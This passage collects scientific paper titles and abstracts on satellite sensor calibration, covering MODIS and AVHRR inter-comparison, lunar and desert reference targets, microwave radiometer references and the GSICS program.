used to check the repeatability of the Terra/Aqua MODIS inter-comparison results. The same approach applied in previous studies is used with defined criteria to generate coincident and co-located near nadir MODIS and AVHRR pixel pairs matched in footprint. Terra and Aqua MODIS to AVHRR reflectance ratios are derived from matched pixel pairs with the same AVHRR used as a transfer radiometer. The ratio differences between Terra and Aqua MODIS/AVHRR give an indication of the calibration biases between the two MODIS instruments. Effects due to pixel footprint mismatch, band spectral differences and surface and atmospheric bi-directional reflectance distributions (BRDFs) are discussed. Trending results from 2002 to 2006 show that Terra and Aqua MODIS reflectances agree with each other within 2% for the three reflective solar bands. --- paper_title: Assessing the consistency of AVHRR and MODIS L1B reflectance for generating Fundamental Climate Data Records paper_content: [1] Satellite detection of the global climate change signals as small as a few percent per decade in albedo critically depends on consistent and accurately calibrated Level 1B (L1B) data or Fundamental Climate Data Records (FCDRs). Detecting small changes in signal over decades is a major challenge not only to the retrieval of geophysical parameters from satellite observations, but more importantly to the current state-of-the-art calibration, since such small changes can easily be obscured by erroneous variations in the calibration, especially for instruments with no onboard calibration, such as the Advanced Very High Resolution Radiometer (AVHRR). Without dependable FCDRs, its derivative Thematic Climate Data Records (TCDRs) are bound to produce false trends with questionable scientific value. This has been increasingly recognized by more and more remote sensing scientists. In this study we analyzed the consistency of calibrated reflectance from the operational L1B data between AVHRR on NOAA-16 and -17 and between NOAA-16/AVHRR and Aqua/MODIS, based on Simultaneous Nadir Overpass (SNO) observation time series. Analyses suggest that the NOAA-16 and -17/AVHRR operationally calibrated reflectance became consistent two years after the launch of NOAA-17, although they still differ by 9% from the MODIS reflectance for the 0.63 μm band. This study also suggests that the SNO method has reached a high level of relative accuracy (∼1.5%) for estimating the consistency for both the 0.63 and 0.84 μm bands between AVHRRs, and a 0.9% relative accuracy between AVHRR and MODIS for the 0.63 μm band. It is believed that the methodology is applicable to all historical AVHRR data for improving the calibration consistency, and work is in progress generating FCDRs from the nearly 30 years of AVHRR data using the SNO and other complimentary methods. A more consistent historical AVHRR L1B data set will be produced for a variety of geophysical products including aerosol, vegetation, cloud, and surface albedo to support global climate change detection studies. --- paper_title: An Extended and Improved Special Sensor Microwave Imager (SSM/I) Period of Record paper_content: Abstract The National Oceanic and Atmospheric Administration National Climatic Data Center has served as the archive of the Defense Meteorological Satellite Program Special Sensor Microwave Imager (SSM/I) data from the F-8, F-10, F-11, F-13, F-14, and F-15 platforms covering the period from July 1987 to the present. Passive microwave satellite measurements from SSM/I have been used to generate climate products in support of national and international programs. The SSM/I temperature data record (TDR) and sensor data record (SDR) datasets have been reprocessed and stored as network Common Data Form (netCDF) 3-hourly files. In addition to reformatting the data, a normalized anomaly (z score) for each footprint temperature value was calculated by subtracting each radiance value with the corresponding monthly 1° grid climatological mean and dividing it by the associated climatological standard deviation. Threshold checks were also used to detect radiance, temporal, and geolocation values that were outside the ... --- paper_title: Three decades of intersatellite‐calibrated High‐Resolution Infrared Radiation Sounder upper tropospheric water vapor paper_content: [1] To generate a climatologically homogenized time series of the upper tropospheric water vapor (UTWV), intersatellite calibration is carried out for 3 decades of High-Resolution Infrared Radiation Sounder (HIRS) channel 12 clear-sky measurements. Because of the independence of the individual satellite's instrument calibration, intersatellite biases exist from satellite to satellite. To minimize the expected intersatellite biases, measurement adjustments are derived from overlapping HIRS data from the equator to the poles to account for the large global temperature observation range. Examination of the intersatellite biases shows that the biases are scene temperature–dependent. Many overlapping satellites have bias variations of more than 0.5 K across the scene temperature ranges. An algorithm is developed to account for the varying biases with respect to brightness temperature. Analyses based on the intercalibrated data show that selected regions of UTWV are highly correlated with low-frequency indexes such as the Pacific Decadal Oscillation index and the Pacific and North America index, especially in the winter months. The derived upper tropospheric humidity in the central Pacific also corresponds well with the Nino 3.4 index. Thirty year trend analysis indicates an increase of upper tropospheric humidity in the equatorial tropics. The areal coverage of both high and low humidity values also increased over time. These features suggest the possibility of enhanced convective activity in the tropics. --- paper_title: Construction of the RSS V3.2 Lower-Tropospheric Temperature Dataset from the MSU and AMSU Microwave Sounders paper_content: Abstract Measurements made by microwave sounding instruments provide a multidecadal record of atmospheric temperature in several thick atmospheric layers. Satellite measurements began in late 1978 with the launch of the first Microwave Sounding Unit (MSU) and have continued to the present via the use of measurements from the follow-on series of instruments, the Advanced Microwave Sounding Unit (AMSU). The weighting function for MSU channel 2 is centered in the middle troposphere but contains significant weight in the lower stratosphere. To obtain an estimate of tropospheric temperature change that is free from stratospheric effects, a weighted average of MSU channel 2 measurements made at different local zenith angles is used to extrapolate the measurements toward the surface, which results in a measurement of changes in the lower troposphere. In this paper, a description is provided of methods that were used to extend the MSU method to the newer AMSU channel 5 measurements and to intercalibrate the resul... --- paper_title: Prime candidate Earth targets for the post-launch radiometric calibration of space-based optical imaging instruments paper_content: This paper provides a comprehensive list of prime candidate terrestrial targets for consideration as benchmark sites for the post-launch radiometric calibration of space-based instruments. The key characteristics of suitable sites are outlined primarily with respect to selection criteria, spatial uniformity, and temporal stability. The establishment and utilization of such benchmark sites is considered an important element of the radiometric traceability of satellite image data products for use in the accurate monitoring of environmental change. --- paper_title: IASI spectral radiance validation inter-comparisons : case study assessment from the JAIVEx field campaign paper_content: Advanced satellite sensors are tasked with improving global-scale measurements of the Earth's atmosphere, clouds, and surface to enable enhancements in weather prediction, climate monitoring, and environmental change detection. Measurement system validation is crucial to achieving this goal and maximizing research and operational utility of resultant data. Field campaigns employing satellite under-flights with well-calibrated Fourier Transform Spectrometer (FTS) sensors aboard high-altitude aircraft are an essential part of this validation task. The National Polar-orbiting Operational Environmental Satellite System (NPOESS) Airborne Sounder Testbed-Interferometer (NAST-I) has been a fundamental contributor in this area by providing coincident high spectral and spatial resolution observations of infrared spectral radiances along with independently-retrieved geophysical products for comparison with like products from satellite sensors being validated. This manuscript focuses on validating infrared spectral radiance from the Infrared Atmospheric Sounding Interferometer (IASI) through a case study analysis using data obtained during the recent Joint Airborne IASI Validation Experiment (JAIVEx) field campaign. Emphasis is placed upon the benefits achievable from employing airborne interferometers such as the NAST-I since, in addition to IASI radiance calibration performance assessments, cross-validation with other advanced sounders such as the AQUA Atmospheric InfraRed Sounder (AIRS) is enabled. --- paper_title: Monitoring of IR Clear-Sky Radiances over Oceans for SST (MICROS) paper_content: Monitoring of IR Clear-sky Radiances over Oceans for SST (MICROS, www.star.nesdis.noaa.gov/sod/sst/micros/) is a web-based tool used to monitor the Model minus Observation (M-O) biases in clear-sky brightness temperatures (BT) over oceans, produced by the newly developed Advanced Clear-Sky Processor for Oceans (ACSPO). ACSPO version 1.0 became operational in May 2008 with AVHRR Global Area Coverage data from NOAA-18 and MetOp-A. Currently, it generates clear-sky radiances (CSR), sea surface temperature (SST), and aerosol products from four platforms including NOAA-16 and -17, which are also processed for cross-platform checks. The central part of ACSPO is the fast Community Radiative Transfer Model (CRTM), which is used in conjunction with Reynolds SST and Global Forecast System (GFS) upper-air data to simulate clear-sky BTs in AVHRR Ch3B (3.7 μm), 4 (11 μm), and 5 (12 μm). CRTM clear-sky BTs are reported on ACSPO product granules alongside with AVHRR measured clear-sky BTs. Currently, MICROS performs three functions in near-real time: it runs ACSPO processing for four platforms, performs statistical analyses of the M-O biases, and publishes summary results on the web. This paper documents the MICROS system and discusses effects of three ACSPO versions on the stability of the global M-O bias. The upgrades did not significantly affect mean M-O biases, but their standard deviations (STD) have significantly improved. Double-differencing technique is employed to check clear-sky radiances over ocean for cross-platform consistency. All analyses show that NOAA-16 radiances are highly unstable in all three bands. This satellite currently flies close to the terminator. Also, its AVHRR sensor has been unstable since September 2003. Radiances from the three other platforms are generally stable and cross-platform consistent to within 0.01-0.04 K, except for NOAA-18 Ch4 which shows a ~-0.11 K bias relative to NOAA-17 and ~-0.07 K bias relative to MetOp-A. Work is underway to extend MICROS functionality to include monitoring of clear-sky BTs from MSG/SEVIRI. NPOESS/VIIRS and GOES-R/ABI data will also be added to MICROS once these sensors are in orbit. For accurate physical (CRTM-based) SST retrievals, biases in AVHRR BTs should be fully understood and minimized. Improvements to daytime CRTM modeling are also underway. --- paper_title: Online catalog of world-wide test sites for the post-launch characterization and calibration of optical sensors paper_content: In an era when the number of Earth-observing satellites is rapidly growing and measurements from these sensors are used to answer increasingly urgent global issues, it is imperative that scientists and decision-makers can rely on the accuracy of Earth-observing data products. The characterization and calibration of these sensors are vital to achieve an integrated Global Earth Observation System of Systems (GEOSS) for coordinated and sustained observations of Earth. The U.S. Geological Survey (USGS), as a supporting member of the Committee on Earth Observation Satellites (CEOS) and GEOSS, is working with partners around the world to establish an online catalog of prime candidate test sites for the post-launch characterization and calibration of space-based optical imaging sensors. The online catalog provides easy public Web site access to this vital information for the global community. This paper describes the catalog, the test sites, and the methodologies to use the test sites. It also provides information regarding access to the online catalog and plans for further development of the catalog in cooperation with calibration specialists from agencies and organizations around the world. Through greater access to and understanding of these vital test sites and their use, the validity and utility of information gained from Earth remote sensing will continue to improve. --- paper_title: Consistency assessment of Atmospheric Infrared Sounder and Infrared Atmospheric Sounding Interferometer radiances: Double differences versus simultaneous nadir overpasses paper_content: [1] Quantifying the radiometric difference and creating a calibration link between Atmospheric Infrared Sounder (AIRS) on Aqua and Infrared Atmospheric Sounding Interferometer (IASI) on MetOp are crucial for creating fundamental climate data records and intercalibrating other narrowband or broadband satellite instruments. This study employs two different methods to assess the AIRS and IASI radiance consistency within the four Geostationary Operational Environmental Satellite (GOES) imager infrared channels (with central wavelengths at 6.7, 10.7, 12.0, and 13.3 μm) through a period of 2 years and 9 months. The first method employs the differences of AIRS and IASI relative to the GOES observations sampled in the tropics to indirectly track the AIRS and IASI radiance differences. The second approach directly compares AIRS and IASI in the polar regions through the simultaneous nadir overpass observations. Both methods reveal that AIRS and IASI radiances are in good agreement with each other both in the tropics and in the polar regions within GOES imager channels used in this study, while AIRS is found to be slightly warmer than IASI by less than 0.1 K. --- paper_title: Monitoring Satellite Radiance Biases Using NWP Models paper_content: Radiances measured by satellite radiometers are often subject to biases due to limitations in their radiometric calibration. In support of the Global Space-based Inter-Calibration System project, to improve the quality of calibrated radiances from atmospheric sounders and imaging radiometers, an activity is underway to compare routinely measured radiances with those simulated from operational global numerical weather prediction (NWP) fields. This paper describes the results obtained from the first three years of these comparisons. Data from the High-resolution Infrared Radiation Sounder, Spinning Enhanced Visible and Infrared Imager, Advanced Along-Track Scanning Radiometer, Advanced Microwave Sounding Unit, and Microwave Humidity Sounder radiometers, together with the Atmospheric Infrared Sounder, a spectrometer, and the Infrared Atmospheric Sounding Interferometer, an interferometer, were included in the analysis. Changes in mean biases and their standard deviations were used to investigate the temporal stability of the bias and radiometric noise of the instruments. A double difference technique can be employed to remove the effect of changes or deficiencies in the NWP model which can contribute to the biases. The variation of the biases with other variables is also investigated, such as scene temperature, scan angle, location, and time of day. Many of the instruments were shown to be stable in time, with a few exceptions, but measurements from the same instrument on different platforms are often biased with respect to each other. The limitations of the polar simultaneous nadir overpasses often used to monitor biases between polar-orbiting sensors are shown with these results due to the apparent strong dependence of some radiance biases on scene temperature. --- paper_title: Radiometric Calibration of Landsat paper_content: The radiometric calibration of the sensors on the Landsat se- ries of satellites is a contributing factor to the success of the Landsat data set. The calibration of these sensors has relied on the preflight laboratory work as well as on inflight tech- niques using on-board calibrators and vicarious techniques. Descriptions of these methods and systems are presented. Results of the on-board calibrators and reflectance-based, ground reference calibrations of Landsat 5 Thematic Mapper are presented that indicate the absolute radiometric calibra- tion of bands 1 to 4 should have an uncertainty of less than 5.0 percent. Bands 5 and 7 have slightly higher uncertainties, but should be less than 10 percent. The results also show that the on-board calibrators are of higher precision than the vicarious calibration but that the vicarious calibration results should have higher accuracy. Introduction The Landsat series of satellites provides the longest running continuous data set of high spatial-resolution imagery dating back to the launch of Landsat 1 in 1972. Part of the success of the Landsat program has been the ability to understand the radiometric properties of the sensors. This understanding has been due to the combination of prelaunch and post- launch efforts using laboratory, on-board, and vicarious cali- bration methods. The radiometric calibration of these systems helps characterize the operation of the sensors, but more importantly, the calibration allows the full Landsat data set to be used in a quantitative sense. A brief overview of the Landsat systems is given here, but the reader is directed to Engel and Weinstein (1983), Lansing and Cline (1975), Markham and Barker (1987), and Slater (1980) for detailed descriptions. The Landsat series of satellites can be viewed in two distinct parts. The first in- cludes Landsats 1, 2, and 3 that carried two sensor systems: the return beam vidicon (RBV) and the Multispectral Scanner (MSS) system. The RBv camera systems on Landsats 1 and 2 were multispectral with three cameras, while the system on Landsat 3 used only two cameras in a panchromatic mode. Landsats 1, 2, and 3 operated in a glg-krn, sun-synchronous orbit with an 18-day repeat cycle. The second phase of Land- sat includes Landsats 4 and 5. These platforms omitted the RBV cameras but still carried the Mss. These two platforms also carried the Thematic Mapper (TM), and their orbits were lowered to 705 krn with a 16-day repeat cycle. The MSS is a 6-bit, whiskbroom sensor with six detectors for each of its four bands. These bands are centered roughly at 0.55, 0.65, 0.75, and 0.85 pm (the MSS on Landsat 3 also had a fifth band between 10.4 and 12.6 pm). Bands 1 to 3 use photomultiplier tubes, while band 4 uses photodiodes. The MSS only collects data in one scan direction, and there is no compensation in the scan for the forward motion of the platform. At the end of every other scan, a rotating shutter and mirror assembly allows light from a calibration lamp to reach the detectors. The TM is also a whiskbroom system but it scans in both the forward and backward cross-track directions, and it cor- rects for the forward motion of the platform. In addition, the TM has 8-bit radiometric resolution and seven bands. Bands 1 to 5 and 7 each have 16 detectors with center wavelengths of roughly 0.49, 0.56, 0.66, 0.83, 1.67, and 2.24 Fm. Band 6 has four detectors and is centered around 11.5 pm. Bands 1 to 4 use silicon-based detectors, bands 5 and 7 use indium antimonide detectors, and band 6 uses mercury-cadmium-tel- luride detectors. Bands 5, 6, and 7 are part of the cold-focal plane that is cooled to 85°K through the use of a radiative cooler. The TM has an on-board calibration system composed of a shutter that oscillates rather than rotates and allows cali- bration data to be collected at the end of each scan. A great deal of research was done during the early days --- paper_title: Determination of an Amazon Hot Reference Target for the On-Orbit Calibration of Microwave Radiometers paper_content: Abstract A physically based model is developed to determine hot calibration reference brightness temperatures (TBs) over depolarized regions in the Amazon rain forest. The model can be used to evaluate the end-to-end calibration of any satellite microwave radiometer operating at a frequency between 18 and 40 GHz and angle of incidence between nadir and 55°. The model is constrained by Special Sensor Microwave Imager (SSM/I) TBs measured at 19.35, 22.2, and 37.0 GHz at a 53° angle of incidence and extrapolates/interpolates those measurements to other frequencies and incidence angles. The rms uncertainty in the physically based model is estimated to be 0.57 K. For instances in which coincident SSM/I measurements are not available, an empirical formula has been fit to the physical model to provide hot reference brightness temperature as a function of frequency, incidence angle, time of day, and day of year. The empirical formula has a 0.1-K rms deviation from the physically based model for annual averaged me... --- paper_title: Detection of calibration drifts in spaceborne microwave radiometers using a vicarious cold reference paper_content: The coldest possible brightness temperatures observed by a downward-looking microwave radiometer from space are often produced by calm oceans under cloud-free skies and very low humidity. This set of conditions tends to occur with sufficient regularity that an orbiting radiometer will accumulate a useful number of observations within a period of a few days to weeks. Histograms of the radiometer's coldest measurements provide an anchor point against which very small drifts in absolute calibration can be detected. This technique is applied to the TOPEX microwave radiometer (TMR), and a statistically significant drift of several tenths of a Kelvin per year is clearly detected in one of the channels. TMR housekeeping calibration data indicates a likely cause for the drift, as small changes in the isolation of latching ferrite circulators that are used in the onboard calibration-switch assembly. This method can easily be adapted to other microwave radiometers, especially imagers operating at frequencies in the atmospheric windows. In addition to detecting long-term instrument drifts with high precision, the method also provides a means for cross-calibrating different instruments. The cold reference provides a common tie point, even between sensors operating at different polarizations and/or incidence angles. --- paper_title: In-flight calibration of large field of view sensors at short wavelengths using Rayleigh scattering paper_content: Abstract Satellite observations over the ocean in the backscatter direction are dominated by Rayleigh scattering. We use this predictable radiance for in-flight calibration of the visible SPOT channels. Two methods are evaluated. The first method directly relates the measured numerical signal in a short wavelength channel to the predicted reflectance. In the second method, we use a second channel centred at a longer wavelength, to correct the short wavelength channel for the effect of the atmospheric aerosol contribution. These two methods are examined for channel B0 , centred at 045 μm planned for launch on SPOT-4 VEGETATION, and for channel B1 centred at 0-55 mu;mm, currently on-board SPOT-1 HRV. In both cases, the channel B3 , centred at 0-85 mu;mm is used for aerosol correction. Error analysis shows that accuracies of 3 and 5 per cent respectively can be achieved for B0 and B1. The last section of the paper is devoted to a validation of the error analysis using SPOT-1 HRV data. --- paper_title: Monitoring of Radiometric Sensitivity Changes of Space Sensors Using Deep Convective Clouds: Operational Application to PARASOL paper_content: Deep convective clouds have been tested to be used as stable reference for calibration purposes: the monitoring of the radiometric changes of space sensors in the spectral range from blue to short-wave infrared. After an appropriate selection, the clouds have been characterized for their brightness, spectral aspects, bidirectional signature, stability, and homogeneity. For this, radiative transfer computations using a discrete ordinate code, as well as remote sensing measurements from the PARASOL satellite, were analyzed. The first main result is a confirmation that the monthly mean reflectance over deep convective clouds is quite stable as suggested in other papers. Moreover, the excellent spectral properties of deep convective clouds are really convenient for a temporal monitoring if it can be assumed that a reference band is stable or well characterized with time. If the reference band is perfectly known, the accuracy of the temporal monitoring is about 0.2%. Experimental results are provided with PARASOL data for which the temporal drift is known with an accuracy better than 0.5% for the three years in orbit (accuracy which includes the uncertainty of the reference band). --- paper_title: Comparison of SeaWiFS measurements of the Moon with the U.S. Geological Survey lunar model. paper_content: The Sea-Viewing Wide-Field-of-View Sensor (SeaWiFS) has made monthly observations of the Moon since 1997. Using 66 monthly measurements, the SeaWiFS calibration team has developed a correction for the instrument's on-orbit response changes. Concurrently, a lunar irradiance model has been developed by the U.S. Geological Survey (USGS) from extensive Earth-based observations of the Moon. The lunar irradiances measured by SeaWiFS are compared with the USGS model. The comparison shows essentially identical response histories for SeaWiFS, with differences from the model of less than 0.05% per thousand days in the long-term trends. From the SeaWiFS experience we have learned that it is important to view the entire lunar image at a constant phase angle from measurement to measurement and to understand, as best as possible, the size of each lunar image. However, a constant phase angle is not required for using the USGS model. With a long-term satellite lunar data set it is possible to determine instrument changes at a quality level approximating that from the USGS lunar model. However, early in a mission, when the dependence on factors such as phase and libration cannot be adequately determined from satellite measurements alone, the USGS model is critical to an understanding of trends in instruments that use the Moon for calibration. This is the case for SeaWiFS. --- paper_title: Possibility of the Visible-Channel Calibration Using Deep Convective Clouds Overshooting the TTL paper_content: Abstract The authors examined the possible use of deep convective clouds (DCCs), defined as clouds that overshoot the tropical tropopause layer (TTL), for the calibration of satellite measurements at solar channels. DCCs are identified in terms of the Moderate Resolution Imaging Spectroradiometer (MODIS) 10.8-μm brightness temperature (TB11) on the basis of a criterion specified by TB11 ≤ 190 K. To determine the characteristics of these clouds, the MODIS-based cloud optical thickness (COT) and effective radius (re) for a number of identified DCCs are analyzed. It is found that COT values for most of the 4249 DCC pixels observed in January 2006 are close to 100. Based on the MODIS quality-assurance information, 90% and 70.2% of the 4249 pixels have COT larger than 100 and 150, respectively. On the other hand, the re values distributed between 15 and 25 μm show a sharp peak centered approximately at 20 μm. Radiances are simulated at the MODIS 0.646-μm channel by using a radiative transfer model under homoge... --- paper_title: Selection and characterization of Saharan and Arabian desert sites for the calibration of optical satellite sensors paper_content: Desert areas are good candidates for the assessment of multitemporal, multiband, or multiangular calibration of optical satellite sensors. This article describes a selection procedure of desert sites in North Africa and Saudi Arabia, of size 100 × 100 km2, using a criterion of spatial uniformity in a series of Meteosat-4 visible data. Twenty such sites are selected with a spatial uniformity better than 3% in relative value in a multitemporal series of cloud free images. These sites are among the driest sites in the world. Their meteorological properties are here described in terms of cloud cover with ISCCP data and precipitation using data from a network of meteorological stations. Most of the selected sites are large sand seas, the geomorphology of which can be characterized with Spot data. The temporal stability of the spatially averaged reflectance of each selected site is investigated at seasonal and hourly time scales with multitemporal series of Meteosat-4 data. It is found that the temporal variations, of typical peak-to-peak amplitude 8–15% in relative value, are mostly controlled by directional effects. Once the directional effects are removed, the residual rms variations, representative of random temporal variability, are on the order of 1–2% in relative value. The suitability of use of these selected sites in routine operational calibration procedures is briefly discussed. --- paper_title: Photometric Stability of the Lunar Surface paper_content: Abstract The rate at which cratering events currently occur on the Moon is considered in light of their influence on the use of the Moon as a radiometric standard. The radiometric effect of small impact events is determined empirically from the study of Clementine images. Events that would change the integral brightness of the moon by 1% are expected once per 1.4 Gyr. Events that cause a 1% shift in one pixel for low Earth-orbiting instruments with a 1-km nadir field of view are expected approximately once each 43 Myr. Events discernible at 1% radiometric resolution with a 5 arc-sec telescope resolution correspond to crater diameters of approximately 210 m and are expected once every 200 years. These rates are uncertain by a factor of two. For a fixed illumination and observation geometry, the Moon can be considered photometrically stable to 1 × 10 −8 per annum for irradiance, and 1 × 10 −7 per annum for radiance at a resolution common for spacecraft imaging instruments, exceeding reasonable instrument goals by six orders of magnitude. --- paper_title: THE SPECTRAL IRRADIANCE OF THE MOON paper_content: Images of the Moon at 32 wavelengths from 350 to 2450 nm have been obtained from a dedicated observatory during the bright half of each month over a period of several years. The ultimate goal is to develop a spectral radiance model of the Moon with an angular resolution and radiometric accuracy appropriate for calibration of Earth-orbiting spacecraft. An empirical model of irradiance has been developed that treats phase and libration explicitly, with absolute scale founded on the spectra of the star Vega and returned Apollo samples. A selected set of 190 standard stars are observed regularly to provide nightly extinction correction and long-term calibration of the observations. The extinction model is wavelength-coupled and based on the absorption coefficients of a number of gases and aerosols. The empirical irradiance model has the same form at each wavelength, with 18 coefficients, eight of which are constant across wavelength, for a total of 328 coefficients. Over 1000 lunar observations are fitted at each wavelength; the average residual is less than 1%. The irradiance model is actively being used in lunar calibration of several spacecraft instruments and can track sensor response changes at the 0.1% level. --- paper_title: In-flight calibration of the POLDER polarized channels using the Sun's glitter paper_content: The spaceborne sensor Polarization and Directionality of the Earth Reflectances (POLDER), launched on the Japanese platform Advanced Earth Observation Satellite (ADEOS) on August 17, 1996, is a new instrument devoted to multispectral observations of the directionality and polarization of the solar radiation reflected by the Earth-atmosphere system. Polarization measurements are performed in three channels, centered at 443, 670, and 865 nm. As POLDER has no onboard calibration system, in-flight calibration methods have been developed. The authors address in this paper the calibration of the polarization measurements. The method uses the sunlight reflected within the Sun's glitter. While the radiance of the Sun's glitter depends strongly on the sea surface roughness, its intrinsic degree of polarization depends only on the observation geometry, which is specially convenient for calibration purposes. However, the degree of polarization measured at the satellite level is affected by the atmosphere. The proposed calibration scheme allows the authors to take into account the influence of the atmosphere on the degree of polarization measured in some viewing direction within the glitter pattern by using the radiance measured in the same viewing direction and in another direction far from the glitter. The expected accuracy is about 0.5% in the near-infrared channel 865 nm and about 2% in the visible channels, in terms of percent polarization. The method has been applied successfully to measurements achieved over ocean areas with the airborne version of the POLDER instrument. --- paper_title: Evaluation of radiative transfer simulations over bright desert calibration sites paper_content: The Spinning Enhanced Visible and Infrared Imager (SEVIRI), the Meteosat Second Generation main radiometer, measures the reflected solar radiation within three spectral bands centered at 0.6, 0.8, and 1.6 /spl mu/m, and within a broadband. This broadband is similar to the solar channel of the radiometer onboard the first generation of METEOSAT satellites. The operational absolute calibration of these channels relies on modeled radiances over bright desert sites, as no in-flight calibration device is available. These simulated radiances represent, therefore, the "reference" against which SEVIRI is calibrated. The present study describes the radiative properties of these targets and evaluates the uncertainties associated with the characterization of this "reference", i.e. the modeled radiances. To this end, top-of-atmosphere simulated radiances are compared with several thousands of calibrated observations acquired by the European Remote Sensing 2/Along-Track Scanning Radiometer 2 (ERS2/ATSR-2), SeaStar/Sea-viewing Wide Field-of-view Sensor (SeaWiFS), Syste/spl grave/me Pour l'Observation de la Terre 4 (SPOT-4/VEGETATION), and the Environmental Research Satellite/Medium Resolution Imaging Spectrometer (ENVISAT/MERIS) instruments over the SEVIRI desert calibration sites. Results show that the mean relative bias between observation and simulation does not exceed 3% in the red and near-infrared spectral bands with respect to the first two instruments. --- paper_title: Evaluation of ISCCP Multisatellite Radiance Calibration for Geostationary Imager Visible Channels Using the Moon paper_content: Since 1983, the International Satellite Cloud Climatology Project (ISCCP) has collected Earth radiance data from the succession of geostationary and polar-orbiting meteorological satellites operated by weather agencies worldwide. Meeting the ISCCP goals of global coverage and decade-length time scales requires consistent and stable calibration of the participating satellites. For the geostationary imager visible channels, ISCCP calibration provides regular periodic updates from regressions of radiances measured from coincident and collocated observations taken by Advanced Very High Resolution Radiometer instruments. As an independent check of the temporal stability and intersatellite consistency of ISCCP calibrations, we have applied lunar calibration techniques to geostationary imager visible channels using images of the Moon found in the ISCCP data archive. Lunar calibration enables using the reflected light from the Moon as a stable and consistent radiometric reference. Although the technique has general applicability, limitations of the archived image data have restricted the current study to Geostationary Operational Environmental Satellite and Geostationary Meteorological Satellite series. The results of this lunar analysis confirm that ISCCP calibration exhibits negligible temporal trends in sensor response but have revealed apparent relative biases between the satellites at various levels. However, these biases amount to differences of only a few percent in measured absolute reflectances. Since the lunar analysis examines only the lower end of the radiance range, the results suggest that the ISCCP calibration regression approach does not precisely determine the intercept or the zero-radiance response level. We discuss the impact of these findings on the development of consistent calibration for multisatellite global data sets. --- paper_title: Improvements in the star-based monitoring of GOES Imager visible-channel responsivities paper_content: Stars are regularly observed in the visible channels of the GOES Imagers for real-time navigation operations. However, we have been also using star observations off-line to deduce the rate of degradation of the responsivity of the visible channels. We estimate degradation rates from the time series of the intensities of the Imagers' output signals, available in the GOES Orbit and Attitude Tracking System (OATS). We begin by showing our latest results in monitoring the responsivities of the visible channels on GOES-8, GOES-10 and GOES-12. Unfortunately, the OATS computes the intensities of the star signals with approximations suitable for navigation, not for estimating accurate signal strengths, and thus we had to develop objective criteria for screening out unsuitable data. With several layers of screening, our most recent trending method yields smoother time series of star signals, but the time series are supported by a smaller pool of stars. With the goal of simplifying the task of data selection and to retrieve stars that have been rejected in the screening, we tested a technique that accessed the raw star measurements before they were processed by the OATS. We developed formulations that produced star signals in a manner more suitable for monitoring the conditions of the visible channels. We present specifics of this process together with sample results. We discuss improvements in the quality of the time series that allow for more reliable inferences on the characteristics of the visible channels. --- paper_title: Recent advances in calibration of the GOES Imager visible channel at NOAA paper_content: To track the degradation of the Imager visible channel on board NOAA’s Geostationary Operation ::: Environmental Satellite (GOES), a research program has been developed using the stellar observations ::: obtained for the purpose of instrument navigation. For monitoring the responsivity of the visible channel, we ::: use observations of approximately fifty stars for each Imager. The degradation of the responsivity is ::: estimated from a single time series based on 30-day averages of the normalized signals from all the stars. ::: Referencing the 30-day averages to the first averaged period of operation, we are able to compute a relative ::: calibration coefficient relative to the first period. Coupling this calibration coefficient with a GOES-MODIS ::: intercalibration technique allows a direct comparison of the star-based relative GOES calibration to a ::: MODIS-based absolute GOES calibration, thus translating the relative star-based calibration to an absolute ::: star-based calibration. We conclude with a discussion of the accuracy of the intercalibrated GOES Imager ::: visible channel radiance measurements. --- paper_title: GSICS Inter-Calibration of Infrared Channels of Geostationary Imagers Using Metop/IASI paper_content: The first products of the Global Space-based Inter-Calibration System (GSICS) include bias monitoring and calibration corrections for the thermal infrared (IR) channels of current meteorological sensors on geostationary satellites. These use the hyperspectral Infrared Atmospheric Sounding Interferometer (IASI) on the low Earth orbit (LEO) Metop satellite as a common cross-calibration reference. This paper describes the algorithm, which uses a weighted linear regression, to compare collocated radiances observed from each pair of geostationary-LEO instruments. The regression coefficients define the GSICS Correction, and their uncertainties provide quality indicators, ensuring traceability to the selected community reference, IASI. Examples are given for the Meteosat, GOES, MTSAT, Fengyun-2, and COMS imagers. Some channels of these instruments show biases that vary with time due to variations in the thermal environment, stray light, and optical contamination. These results demonstrate how inter-calibration can be a powerful tool to monitor and correct biases, and help diagnose their root causes. --- paper_title: The Global Space-Based Inter-Calibration System paper_content: The Global Space-based Inter-Calibration System (GSICS) is a new international program to assure the comparability of satellite measurements taken at different times and locations by different instruments operated by different satellite agencies. Sponsored by the World Meteorological Organization and the Coordination Group for Meteorological Satellites, GSICS will intercalibrate the instruments of the international constellation of operational low-earth-orbiting (LEO) and geostationary earth-orbiting (GEO) environmental satellites and tie these to common reference standards. The intercomparability of the observations will result in more accurate measurements for assimilation in numerical weather prediction models, construction of more reliable climate data records, and progress toward achieving the societal goals of the Global Earth Observation System of Systems. GSICS includes globally coordinated activities for prelaunch instrument characterization, onboard routine calibration, sensor intercomparison of... --- paper_title: Deriving an inter-sensor consistent calibration for the AVHRR solar reflectance data record paper_content: A new set of reflectance calibration coefficients has been derived for channel 1 (0.63 μm) and channel 2 (0.86 μm) of the Advanced Very High Resolution Radiometer (AVHRR) flown on the National Oceanic and Atmospheric Administration (NOAA) and European Organization for the Exploitation of Meteorological Satellites (EUMETSAT) polar orbiting meteorological satellites. This paper uses several approaches that are radiometrically tied to the observations from National Aeronautics and Space Administration's (NASA's) Moderate Resolution Imaging Spectroradiometer (MODIS) imager to make the first consistent set of AVHRR reflectance calibration coefficients for every AVHRR that has ever flown. Our results indicate that the calibration coefficients presented here provide an accuracy of approximately 2% for channel 1 and 3% for channel 2 relative to that from the MODIS sensor. --- paper_title: Improved calibration coefficients for NOAA-14 AVHRR visible and near-infrared channels paper_content: An analysis of the calibration coefficients used to describe sensor degradation in channels 1 and 2 of the Advanced Very High Resolution Radiometer (AVHRR) on the NOAA-14 spacecraft is presented. The radiometrically stable permanent ice sheet of central Antarctica is used as a calibration target to characterize sensor performance. Published calibration coefficients and the coefficients imbedded in the NOAA Level 1b data stream for the period January 1995 to November 1998 are shown to be deficient in correcting for the degradation of the sensor with time since launch. Calibration formulae constructed from NOAA-9 reflectances are used to derive improved calibration coefficients for the AVHRR visible and near-infrared channels for NOAA-14. Channel 1 reflectances for the Greenland ice sheet derived using the new coefficients are consistent with those derived previously using NOAA-9 AVHRR. In addition, improved reference AVHRR channel 2 reflectances for Greenland are derived from NOAA-14 observations. It is re... --- paper_title: Surface characterisation of the Dome Concordia area (Antarctica) as a potential satellite calibration site, using Spot 4/Vegetation instrument paper_content: A good calibration of satellite sensors is necessary to derive reliable quantitative measurements of the surface parameters or to compare data obtained from different sensors. In this study, the snow surface of the high 